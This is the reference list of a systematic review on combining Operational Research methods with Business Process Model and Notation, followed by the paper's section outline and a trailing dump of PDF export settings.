Knowledge accelerator by transversal competences and multivariate adaptive regression splines. Central European Journal of Operations Research 28(2):645–669. Gu J, Goetschalckx M, McGinnis LF. 2010. Research on warehouse design and performance evaluation: a comprehensive review. European Journal of Operational Research 203(3):539–549 DOI 10.1016/j.ejor.2009.07.031. Gómez-Martnez E, Pérez-Blanco F, De Lara J, Vara JM, Marcos E. 2019. Formal support of process chain networks using model-driven engineering and petri nets. In: Proceedings of the 34th ACM/SIGAPP Symposium on Applied Computing. 98–100. Hasic F, De Smedt J, Vanthienen J. 2018. Augmenting processes with decision intelligence: principles for integrated modelling. Decision Support Systems 107:1–12 DOI 10.1016/j.dss.2017.12.008. Herbert LT, Hansen ZNL. 2016. Restructuring of workflows to minimise errors via stochastic model checking: an automated evolutionary approach. Reliability Engineering & System Safety 145:351–365, 12th International Association for Probabilistic Safety Assessment and Management (PSAM12) Conference, Honolulu, HI, June 22–27, 2014. Herbert LT, Hansen Z, Jacobsen P. 2014. SBAT: a stochastic BPMN analysis tool. In: Proceedings of the ASME 12th Biennial Conference on Engineering Systems Design and Analysis—2014, ASME. 12th ASME Biennial Conference on Engineering Systems Design and Analysis (ESDA2014), Copenhagen, Denmark, June 25–27, 2014, Vol. 3. Herbert L, Hansen ZNL, Jacobsen P. 2015. Using quantitative stochastic model checking tool to increase safety and improve efficiency in production processes. In: Nowakowski T, Mlynczak M, JodejkoPietruczuk A, WerbinskaWojciechowska S, eds. Safety and Reliability: Methodology and Applications. 2405–2416, Wroclaw Univ Technol; Polish Safety & Reliabil Assoc; European Safety & Reliabil Assoc. Proceedings of the European Safety and Reliability Conference (ESREL), Wroclaw, Poland, September 14–18, 2014. Herbert L, Hansen ZNL, Jacobsen P, Cunha P. 2014. Evolutionary optimization of production materials workflow processes. In: Constantinescu C, Bauer W, Sauer O, Maropoulos P, eds. 8TH International Conference on Digital Enterprise Technology - DET 2014 Disruptive Innovation in Manufacturing Engineering Towards the 4th Industrial Revulution, volume 25 of Procedia CIRP. 53–60, Int Acad Prod Engn; Fraunhofer Inst Ind Engn IAO. 8th International Conference on Digital Enterprise Technology (DET), Stuttgart, Germany, March 25–28, 2014. Tomaskova and Weber (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.301 27/32 http://dx.doi.org/10.1016/j.laa.2013.10.034 http://dx.doi.org/10.1016/j.dss.2007.10.004 http://dx.doi.org/10.1016/j.ejor.2009.07.031 http://dx.doi.org/10.1016/j.dss.2017.12.008 http://dx.doi.org/10.7717/peerj-cs.301 https://peerj.com/computer-science/ Herbert LT, Sharp R. 2012. Quantitative analysis of probabilistic bpmn workflows. In: Proceedings of the ASME International Design Engineering Technical Conferences and Computers and Information in Engineering Conference 2012, VOL 2, PTS A and B. 509–518, ASME, Design Engn Div; ASME, Comp & Informat Engn Div. ASME International Design Engineering Technical Conferences/Computers Information in Engineering Conference, Chicago, IL, August 12–15, 2012. Herbert L, Sharp R. 2013. Precise quantitative analysis of probabilistic business process model and notation workflows. Journal of Computing and Information Science in Engineering 13(1):69 DOI 10.1115/1.4023362. Herbert L, Sharp R. 2014a. Workflow fault tree generation through model checking. In: Steenbergen R, VanGelder P, Miraglia S, Vrouwenvelder A, eds. Safety, Reliability and Risk Analysis: Beyond the Horizon. 2229–2236, Netherlands Org Appl Sci Res; Delft Univ Technol; Dutch Soc Risk Management & Reliabil Anal; European Safety & Reliabil Assoc. 22nd Annual Conference on European Safety and Reliability (ESREL), Amsterdam, Netherlands, September 29–october 02, 2013. Herbert LT, Sharp R. 2014b. Optimisation of BPMN business models via model checking. In: Proceedings of the ASME International Design Engineering Technical Conferences and Computers and Information in Engineering Conference, 2013. ASME, Design Engn Div; ASME, Comp & Informat Engn Div. ASME International Design Engineering Technical Conferences/Computers and Information in Engineering Conference (IDETC/CIE), Portland, OR, August 04–07, 2013, Vol. 2B. Higgins J, Lasserson T, Chandler J, Tovey D, Churchill R. 2018. Methodological Expectations of Cochrane Intervention Reviews. London: Cochrane. Jaafari A. 1984. Criticism of cpm for project planning analysis. Journal of Construction Engineering and Management 110(2):222–233 DOI 10.1061/(ASCE)0733-9364(1984)110:2(222). Kall P, Wallace SW, Kall P. 1994. Stochastic programming. Berlin: Springer. Kalogirou SA. 2003. Artificial intelligence for the modeling and control of combustion processes: a review. Progress in Energy and Combustion Science 29(6):515–566 DOI 10.1016/S0360-1285(03)00058-3. Kamrani F, Ayani R, Moradi F, Holm G. 2009. Estimating performance of a business process model. In: Proceedings of the 2009 Winter Simulation Confernce (WSC, 2009), Vol. 1–4. Winter Simulation Conference Proceedings, pages 2828+. IEEE. Winter Simulation Conference 2009, Austin, TX, December 13–16, 2009. Piscataway: IEEE. Khlif W, Ben-Abdallah H. 2015. Semantic and structural performer clustering in BPMN models transformed into social network models. In: Lorenz P, Maciaszek L, eds. 2015 10th International Joint Conference on Software Technologies (ICSOFT). Vol. 1, 79–86 Inst Syst & Technologies Informat Control & Commun; Univ Haute Alsace; IEICE Special Interest Grp Software Interprise Modelling; IEEE Comp Soc Tech Council Software Engn; SCITEVENTS; SCITEPRESS; Univ Upper Alsace; Univ Haute Alsace; IEEE Comp Soc; TCSE. 10th International Conference on Software Technologies (ICSOFT), Colmar, France, July 20–22, 2015. Piscataway: IEEE. Khlif W, Ben-Abdallah H, Ben Ayed NE. 2017. A methodology for the semantic and structural restructuring of BPMN models. Business Process Management Journal 23(1):16–46 DOI 10.1108/BPMJ-12-2015-0186. Kitchenham B, Charters S. 2007. Guidelines for performing systematic literature reviews in software engineering. Technical Report EBSE 2007-001, Keele University and Durham University Joint Report. Tomaskova and Weber (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.301 28/32 http://dx.doi.org/10.1115/1.4023362 http://dx.doi.org/10.1061/(ASCE)0733-9364(1984)110:2(222) http://dx.doi.org/10.1016/S0360-1285(03)00058-3 http://dx.doi.org/10.1108/BPMJ-12-2015-0186 http://dx.doi.org/10.7717/peerj-cs.301 https://peerj.com/computer-science/ Kocbek M, Jost G, Hericko M, Polancic G. 2015. Business process model and notation: the current state of affairs. Computer Science and Information Systems 12(2):509–539 DOI 10.2298/CSIS140610006K. Kopecky M, Tomaskova H. 2019. Activity based costing and process simulations. In: Jedlicka P, Maresova P, Soukal I, eds. Hradec Economic Days, Vol. 9, Issue I, Hradec Economic Days. 431–438, Univ Hradec Kralove, Fac Informat & Management; Wroclaw Univ Econ; Cracow Univ Econ; Univ S Bohemia, Off Transfer Technologies; Czech Natl Bank. 17th International Scientific Conference on Hradec Economic Days, Hradec Kralove, Czech Republic, February 05–06, 2019. Kopecky M, Tomaskova H. 2020. The business process model and notation used for the representation of Alzheimer’s disease patients care process. Data 5(1):16 DOI 10.3390/data5010016. Kozlowski SWJ, Chao GT, Grand JA, Braun MT, Kuljanin G. 2013. Advancing multilevel research design: capturing the dynamics of emergence. Organizational Research Methods 16(4):581–615 DOI 10.1177/1094428113493119. Krenek J, Kuca K, Krejcar O, Maresova P, Sobeslav V, Blazek P. 2014. Artificial neural network tools for computerised data modeling and processing. In: 2014 IEEE 15th International Symposium on Computational Intelligence and Informatics (CINTI), International Symposium on Computational Intelligence and Informatics. 255–260, IEEE Hungary Sect; IEEE Computat Intelligence Chapter; IEEE Joint Chapter Robot Automat & Ind Elect Soc; IEEE SMC Soc; Obuda Univ; Hungarian Fuzzy Ass. Budapest, Bahrain, November 19–21, 2014. Piscataway: IEEE. Krogstie J, Sindre G, Jorgensen H. 2006. Process models representing knowledge for action: a revised quality framework. European Journal of Information Systems 15(1):91–102. Lane MS, Mansour AH, Harpell JL. 1993. Operations research techniques: a longitudinal update 1973–1988. Interfaces 23(2):63–68 DOI 10.1287/inte.23.2.63. Maltz E, Kohli A. 1996. Market intelligence dissemination across functional boundaries. Journal of Marketing Research 33(1):47–61 DOI 10.1177/002224379603300105. Maresova P. 2010. Knowledge management in czech enterprises. E & M Ekonomie a Management 13(1):131–144. Maresova P, Sobeslav V, Krejcar O. 2017. Cost-benefit analysis—evaluation model of cloud computing deployment for use in companies. Applied Economics 49(6):521–533 DOI 10.1080/00036846.2016.1200188. Maresova P, Tomaskova H, Kuca K. 2016. The use of simulation modelling in the analysis of the economic aspects of diseases in old age. In: Bilgin M, Danis H, Demir E, Can U, eds. Business Chammenges in the Changing Economic Landscape. Vol. 1, 369–377 Eurasia Business & Econ Soc. 14th Conference of the Eurasia-Business-and-Economics-Society (EBES), Barcelona, Spain, October 23–25, 2014. Mazhar S, Wu PP-Y, Rosemann M. 2018. Designing complex socio-technical process systems— the airport example. Business Process Management Journal 25(5):1101–1125 DOI 10.1108/BPMJ-09-2017-0241. Melao N, Pidd M. 2000. A conceptual framework for understanding business processes and business process modelling. Information Systems Journal 10(2):105–129 DOI 10.1046/j.1365-2575.2000.00075.x. Mendoza Morales LE, Monsalve C, Villavicencio M. 2017. Formal verification of business processes as timed automata. In: 2017 12th Iberian Conference on Information Systems and Technologies (CISTI), Iberian Conference on Information Systems and Technologies. Assoc Iberica Sistemas Tecnologias Informaco; Inst Univ Lisboa; Asoc Tecnicos Informatica; Assoc Tomaskova and Weber (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.301 29/32 http://dx.doi.org/10.2298/CSIS140610006K http://dx.doi.org/10.3390/data5010016 http://dx.doi.org/10.1177/1094428113493119 http://dx.doi.org/10.1287/inte.23.2.63 http://dx.doi.org/10.1177/002224379603300105 http://dx.doi.org/10.1080/00036846.2016.1200188 http://dx.doi.org/10.1108/BPMJ-09-2017-0241 http://dx.doi.org/10.1046/j.1365-2575.2000.00075.x http://dx.doi.org/10.7717/peerj-cs.301 https://peerj.com/computer-science/ Portuguesa Empreendedorismo; IEEE SMC; IEEE Portugal Sect; FCA; Lidel; SAS; Silabo; TAP. Lisbon, Portugal, June 21–24, 2017. Piscataway: IEEE. Moher D, Liberati A, Tetzlaff J, Altman DG, Group TP. 2009. Preferred reporting items for systematic reviews and meta-analyses: the prisma statement. PLOS Medicine 6(7):1–6. Mryglod O, Kenna R, Holovatch Y, Berche B. 2013. Comparison of a citation-based indicator and peer review for absolute and specific measures of research-group excellence. Scientometrics 97(3):767–777 DOI 10.1007/s11192-013-1058-9. Naoum M, El Hichami O, Al Achhab M, El Mohajir Be. 2016. A probabilistic method for business process verification: Reachability, liveness and deadlock detection. In: ElMohajir M, Chahhou M, AlAchhab M, ElMohajir B, eds. 4th IEEE International Colloquium on Information Science and Technology (CIST), Colloquium in Information Science and Technology. 128–132, IEEE; IEEE Comp Soc; IEEE Commun Soc; INNOV ORG; ENSIAS; QATAR UNIV; Akhawayn Univ; Technische Univ Munchen; INSA ROUEN; IEEE Morocco Sect; IEEE Morocco Comp & Commun Joint Chapter. Tangier, Morocco, October 24–26, 2016, Piscataway: IEEE. Negahban A, Smith JS. 2014. Simulation for manufacturing system design and operation: literature review and analysis. Journal of Manufacturing Systems 33(2):241–261 DOI 10.1016/j.jmsy.2013.12.007. Nisler J, Tomaskova H. 2017. BPMN as a quality tool for the efficient functioning of the company. In: Soliman K, ed. Vision 2020: Sustainable Economic Development, Innovation Management, and Global Growth. Vol. I-IX, 3257–3263, Business Inform Management Assoc. 30th International Business-Information-Management-Association Conference, Spain, Nov 08–09, 2017. Nutt PC. 1983. Implementation approaches for project planning. Academy of Management Review 8(4):600–611. OMG.org. 2018. History of formal versions. Available at https://www.omg.org/spec/BPMN (accessed 20 November 2018). Onggo BSS, Proudlove NC, D’Ambrogio SA, Calabrese A, Bisogno S, Ghiron NL. 2018. A BPMN extension to support discrete-event simulation for healthcare applications: an explicit representation of queues, attributes and data-driven decision points. Journal of the Operational Research Society 69(5):788–802 DOI 10.1057/s41274-017-0267-7. Oudah M, Jabeen F, Dixon C. 2018. Determinants linked to family business sustainability in the UAE: an AHP approach. Sustainability 10(1):246 DOI 10.3390/su10010246. Pellerin R, Perrier N, Berthaut F. 2020. A survey of hybrid metaheuristics for the resource- constrained project scheduling problem. European Journal of Operational Research 280(2):395–416 DOI 10.1016/j.ejor.2019.01.063. Recker J. 2012. BPMN research: what we know and what we don’t know. In: International Workshop on Business Process Modeling Notation, Berlin, Heidelberg: Springer, 1–7. Recker J, Rosemann M, Indulska M, Green P. 2009. Business process modeling-a comparative analysis. Journal of the association for information systems 10(4):1–363 DOI 10.17705/1jais.00193. Rekik M, Boukadi K, Ben-Abdallah H. 2016. Specifying business process outsourcing requirements. In: Lorenz P, Cardoso J, Maciaszek L, VanSinderen M, eds. Software Technologies (ICSOFT 2015), volume 586 of Communications in Computer and Information Science. Inst Syst & Technologies Informat Control & Commun; Univ Haute Alsace; IEICE Special Interest Grp Software Interprise Modelling; IEEE Comp Soc Tech Council Software Engn. 10th International Conference on Software Technologies (ICSOFT), Colmar, France, July 20–22, 2015, 175–190. Piscataway: IEEE. Tomaskova and Weber (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.301 30/32 http://dx.doi.org/10.1007/s11192-013-1058-9 http://dx.doi.org/10.1016/j.jmsy.2013.12.007 https://www.omg.org/spec/BPMN http://dx.doi.org/10.1057/s41274-017-0267-7 http://dx.doi.org/10.3390/su10010246 http://dx.doi.org/10.1016/j.ejor.2019.01.063 http://dx.doi.org/10.17705/1jais.00193 http://dx.doi.org/10.7717/peerj-cs.301 https://peerj.com/computer-science/ Repenning N. 2002. A simulation-based approach to understanding the dynamics of innovation implementation. Organization Science 13(2):109–127 DOI 10.1287/orsc.13.2.109.535. Sadiq W, Orlowska M. 2000. Analyzing process models using graph reduction techniques. Information Systems 25(2):117–134. Sarac A, Absi N, Dauzère-Pérès S. 2010. A literature review on the impact of RFID technologies on supply chain management. International Journal of Production Economics 128(1):77–95 DOI 10.1016/j.ijpe.2010.07.039. Savku E, Weber G-W. 2018. A stochastic maximum principle for a markov regime-switching jump-diffusion model with delay and an application to finance. Journal of Optimization Theory and Applications 179(2):696–721 DOI 10.1007/s10957-017-1159-3. Schrijver A. 1998. Theory of linear and integer programming. Hoboken: John Wiley & Sons. Shane S, Cable D. 2002. Network ties, reputation, and the financing of new ventures. Management Science 48(3):364–381 DOI 10.1287/mnsc.48.3.364.7731. Shannon RE, Long SS, Buckles BP. 1980. Operation research methodologies in industrial engineering: a survey. AIIE Transactions 12(4):364–367 DOI 10.1080/05695558008974528. Shapiro A, Dentcheva D, Ruszczy�nski A. 2014. Lectures on stochastic programming: modeling and theory. Philadelphia: SIAM. Silver B. 2009. BPMN method and style: a levels-based methodology for BPM process modeling and improvement using BPMN 2.0. San Francisco: Cody-Cassidy Press. Sterman J. 1994. Learning in and about complex-systems. System Dynamics Review 10(2–3):291–330 DOI 10.1002/sdr.4260100214. Subramanian N, Ramanathan R. 2012. A review of applications of analytic hierarchy process in operations management. International Journal of Production Economics 138(2):215–241 DOI 10.1016/j.ijpe.2012.03.036. Suchenia A, Kluza K, Wisniewski P, Jobczyk K, Ligeza A. 2019. Towards knowledge interoperability between the UML, DMN, BPMN and CMMN models. MATEC Web of Conferences 252:e02011. The Object Management Group. 2011. The business process model and notation specification. Available at http://www.omg.org/spec/BPMN/2.0/ (accessed 30 October 2018). Tomaskova H. 2009. Marketing research of mobile technology used by firms like advantage. In: Perlovsky L, Dionysiou D, Zadeh L, Kostic M, GonzalezConcepcion C, Jaberg H, eds. AEBD ‘09: Proceedings of the World Multiconference on Applied Economics, Business and Development, Recent Advances in Computer Engineering, Spain. 202–205. Tomaskova H. 2017. Levels of business process modeling. In: Soliman K, ed. Vision 2020: Sustainable Economic Development, Innovation Management, and Global Growth. Business Inform Management Assoc. 30th International Business-Information-Management-Association Conference, Madrid, Spain, November 08–09, 2017, Vol. I–IX, 3495–3498. Tomaskova H. 2018. Modeling business processes for decision-making. In: Soliman K, ed. Innovation Management and Education Excellence Through Vision 2020. Int Business Informat Management Assoc. 31st International-Business-Information-Management-Association Conference, Milan, Italy, April 25–26, 2018, Vol. I-XI, 4318–4321. Tomaskova H, Gavalec M. 2013. Decision making based on tropical algebra. In: Vojackova H, ed. Mathematical Methods in Economics 2013, PTS I AND II. 950–955, 31st International Conference on Mathematical Methods in Economics, Jihlava, Czech Republic, September 11–13, 2013. Tomaskova H, Gavalec M. 2014. Max-prod eigenvectors and their applications in decision making. In: Talasova J, Stoklasa J, Talasek T, eds. Mathematical Methods in Economics Tomaskova and Weber (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.301 31/32 http://dx.doi.org/10.1287/orsc.13.2.109.535 http://dx.doi.org/10.1016/j.ijpe.2010.07.039 http://dx.doi.org/10.1007/s10957-017-1159-3 http://dx.doi.org/10.1287/mnsc.48.3.364.7731 http://dx.doi.org/10.1080/05695558008974528 http://dx.doi.org/10.1002/sdr.4260100214 http://dx.doi.org/10.1016/j.ijpe.2012.03.036 http://www.omg.org/spec/BPMN/2.0/ http://dx.doi.org/10.7717/peerj-cs.301 https://peerj.com/computer-science/ (MME 2014). 1045–1050, 32nd International Conference on Mathematical Methods in Economics (MME), Olomouc, Czech Republic, September 10–12, 2014. Tomaskova H, Kopecky M, Maresova P. 2019. Process cost management of Alzheimer’s disease. Processes 7(9):582 DOI 10.3390/pr7090582. Tomaskova H, Kuhnova J, Cimler R, Dolezal O, Kuca K. 2016. Prediction of population with Alzheimer’s disease in the european union using a system dynamics model. Neuropsychiatric Disease and Treatment 12:1589–1598 DOI 10.2147/NDT.S107969. Tomaskova H, Kuhnova J, Kuca K. 2015. Economic model of Alzheimer’s disease. In: Soliman K, ed. Innovation Vision 2020: from Regional Development Sustainability to Global Economic Growth. 25th International-Business-Information-Management-Association Conference, Amsterdam, Netherlands, May 07–08, 2015, Vol. I–VI, 3120. Tomaskova H, Maresova P, Penhaker M, Augustynek M, Klimova B, Fadeyi O, Kuca K. 2019. The business process model and notation of open innovation: the process of developing medical instrument. Journal of Open Innovation: Technology, Market, and Complexity 5(4):101 DOI 10.3390/joitmc5040101. Tsakalidis G, Vergidis K, Kougka G, Gounaris A. 2019. Eligibility of BPMN models for business process redesign. Information-an International Interdisciplinary Journal 10(7):225 DOI 10.3390/info10070225. Van der Aalst W, Adriansyah A, Van Dongen B. 2012. Replaying history on process models for conformance checking and performance analysis. Wiley Interdisciplinary Reviews: Data Mining and Knowledge Discovery 2(2):182–192 DOI 10.1002/widm.1045. Van der Aalst WMP, Reijers HA, Weijters AJMM, Van Dongen BF, De Medeiros AKA, Song M, Verbeek HMW. 2007. Business process mining: an industrial application. Information Systems 32(5):713–732 DOI 10.1016/j.is.2006.05.003. Van Eck NJ, Waltman L, Dekker R, Van den Berg J. 2010. A comparison of two techniques for bibliometric mapping: multidimensional scaling and VOS. Journal of the American Society for Information Science and Technology 61(12):2405–2416 DOI 10.1002/asi.21421. Velasquez M, Hester PT. 2013. An analysis of multi-criteria decision making methods. International Journal of Operations Research 10(2):56–66. Venn J. 1880. I. On the diagrammatic and mechanical representation of propositions and reasonings. London, Edinburgh, and Dublin Philosophical Magazine and Journal of Science 10(59):1–18 DOI 10.1080/14786448008626877. White SA. 2008. BPMN modeling and reference guide: understanding and using BPMN. USA: Future Strategies Inc., Lighthouse Point. Wu PP-Y, Fookes C, Pitchforth J, Mengersen K. 2015. A framework for model integration and holistic modelling of socio-technical systems. Decision Support Systems 71:14–27 DOI 10.1016/j.dss.2015.01.006. Xie Y, Chien C-F, Tang R-Z. 2016. A dynamic task assignment approach based on individual worklists for minimizing the cycle time of business processes. Computers & Industrial Engineering 99:401–414 DOI 10.1016/j.cie.2015.11.023. Xu X, Wang L, Newman ST. 2011. Computer-aided process planning—a critical review of recent developments and future trends. International Journal of Computer Integrated Manufacturing 24(1):1–31 DOI 10.1080/0951192X.2010.518632. Zarour K, Benmerzoug D, Guermouche N, Drira K. 2019. A systematic literature review on BPMN extensions. Business Process Management Journal DOI 10.1108/BPMJ-01-2019-0040. Zyoud SH, Fuchs-Hanusch D. 2017. A bibliometric-based survey on AHP and TOPSIS techniques. Expert Systems with Applications 78:158–181 DOI 10.1016/j.eswa.2017.02.016. Tomaskova and Weber (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.301 32/32 http://dx.doi.org/10.3390/pr7090582 http://dx.doi.org/10.2147/NDT.S107969 http://dx.doi.org/10.3390/joitmc5040101 http://dx.doi.org/10.3390/info10070225 http://dx.doi.org/10.1002/widm.1045 http://dx.doi.org/10.1016/j.is.2006.05.003 http://dx.doi.org/10.1002/asi.21421 http://dx.doi.org/10.1080/14786448008626877 http://dx.doi.org/10.1016/j.dss.2015.01.006 http://dx.doi.org/10.1016/j.cie.2015.11.023 http://dx.doi.org/10.1080/0951192X.2010.518632 http://dx.doi.org/10.1108/BPMJ-01-2019-0040 http://dx.doi.org/10.1016/j.eswa.2017.02.016 http://dx.doi.org/10.7717/peerj-cs.301 https://peerj.com/computer-science/ Approaches combining methods of Operational Research with Business Process Model and Notation: A systematic review Introduction Related works and background Research methodology Results Discussion Conclusion flink7 References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS <FEFF4f7f75288fd94e9b8bbe5b9a521b5efa7684002000500044004600206587686353ef901a8fc7684c976262535370673a548c002000700072006f006f00660065007200208fdb884c9ad88d2891cf62535370300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c676562535f00521b5efa768400200050004400460020658768633002> /CHT <FEFF4f7f752890194e9b8a2d7f6e5efa7acb7684002000410064006f006200650020005000440046002065874ef653ef5728684c9762537088686a5f548c002000700072006f006f00660065007200204e0a73725f979ad854c18cea7684521753706548679c300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c4f86958b555f5df25efa7acb76840020005000440046002065874ef63002> /DAN <FEFF004200720075006700200069006e0064007300740069006c006c0069006e006700650072006e0065002000740069006c0020006100740020006f007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e007400650072002000740069006c0020006b00760061006c00690074006500740073007500640073006b007200690076006e0069006e006700200065006c006c006500720020006b006f007200720065006b007400750072006c00e60073006e0069006e0067002e0020004400650020006f007000720065007400740065006400650020005000440046002d0064006f006b0075006d0065006e0074006500720020006b0061006e002000e50062006e00650073002000690020004100630072006f00620061007400200065006c006c006500720020004100630072006f006200610074002000520065006100640065007200200035002e00300020006f00670020006e0079006500720065002e> /DEU <FEFF00560065007200770065006e00640065006e0020005300690065002000640069006500730065002000450069006e007300740065006c006c0075006e00670065006e0020007a0075006d002000450072007300740065006c006c0065006e00200076006f006e002000410064006f006200650020005000440046002d0044006f006b0075006d0065006e00740065006e002c00200076006f006e002000640065006e0065006e002000530069006500200068006f00630068007700650072007400690067006500200044007200750063006b006500200061007500660020004400650073006b0074006f0070002d0044007200750063006b00650072006e00200075006e0064002000500072006f006f0066002d00470065007200e400740065006e002000650072007a0065007500670065006e0020006d00f60063006800740065006e002e002000450072007300740065006c006c007400650020005000440046002d0044006f006b0075006d0065006e007400650020006b00f6006e006e0065006e0020006d006900740020004100630072006f00620061007400200075006e0064002000410064006f00620065002000520065006100640065007200200035002e00300020006f0064006500720020006800f600680065007200200067006500f600660066006e00650074002000770065007200640065006e002e> /ESP <FEFF005500740069006c0069006300650020006500730074006100200063006f006e0066006900670075007200610063006900f3006e0020007000610072006100200063007200650061007200200064006f00630075006d0065006e0074006f0073002000640065002000410064006f0062006500200050004400460020007000610072006100200063006f006e00730065006700750069007200200069006d0070007200650073006900f3006e002000640065002000630061006c006900640061006400200065006e00200069006d0070007200650073006f0072006100730020006400650020006500730063007200690074006f00720069006f00200079002000680065007200720061006d00690065006e00740061007300200064006500200063006f00720072006500630063006900f3006e002e002000530065002000700075006500640065006e00200061006200720069007200200064006f00630075006d0065006e0074006f00730020005000440046002000630072006500610064006f007300200063006f006e0020004100630072006f006200610074002c002000410064006f00620065002000520065006100640065007200200035002e003000200079002000760065007200730069006f006e0065007300200070006f00730074006500720069006f007200650073002e> /FRA <FEFF005500740069006c006900730065007a00200063006500730020006f007000740069006f006e00730020006100660069006e00200064006500200063007200e900650072002000640065007300200064006f00630075006d0065006e00740073002000410064006f00620065002000500044004600200070006f007500720020006400650073002000e90070007200650075007600650073002000650074002000640065007300200069006d007000720065007300730069006f006e00730020006400650020006800610075007400650020007100750061006c0069007400e90020007300750072002000640065007300200069006d007000720069006d0061006e0074006500730020006400650020006200750072006500610075002e0020004c0065007300200064006f00630075006d0065006e00740073002000500044004600200063007200e900e90073002000700065007500760065006e0074002000ea0074007200650020006f007500760065007200740073002000640061006e00730020004100630072006f006200610074002c002000610069006e00730069002000710075002700410064006f00620065002000520065006100640065007200200035002e0030002000650074002000760065007200730069006f006e007300200075006c007400e90072006900650075007200650073002e> /ITA <FEFF005500740069006c0069007a007a006100720065002000710075006500730074006500200069006d0070006f007300740061007a0069006f006e00690020007000650072002000630072006500610072006500200064006f00630075006d0065006e00740069002000410064006f006200650020005000440046002000700065007200200075006e00610020007300740061006d007000610020006400690020007100750061006c0069007400e00020007300750020007300740061006d00700061006e0074006900200065002000700072006f006f0066006500720020006400650073006b0074006f0070002e0020004900200064006f00630075006d0065006e007400690020005000440046002000630072006500610074006900200070006f00730073006f006e006f0020006500730073006500720065002000610070006500720074006900200063006f006e0020004100630072006f00620061007400200065002000410064006f00620065002000520065006100640065007200200035002e003000200065002000760065007200730069006f006e006900200073007500630063006500730073006900760065002e> /JPN <FEFF9ad854c18cea51fa529b7528002000410064006f0062006500200050004400460020658766f8306e4f5c6210306b4f7f75283057307e30593002537052376642306e753b8cea3092670059279650306b4fdd306430533068304c3067304d307e3059300230c730b930af30c830c330d730d730ea30f330bf3067306e53705237307e305f306f30d730eb30fc30d57528306b9069305730663044307e305930023053306e8a2d5b9a30674f5c62103055308c305f0020005000440046002030d530a130a430eb306f3001004100630072006f0062006100740020304a30883073002000410064006f00620065002000520065006100640065007200200035002e003000204ee5964d3067958b304f30533068304c3067304d307e30593002> /KOR 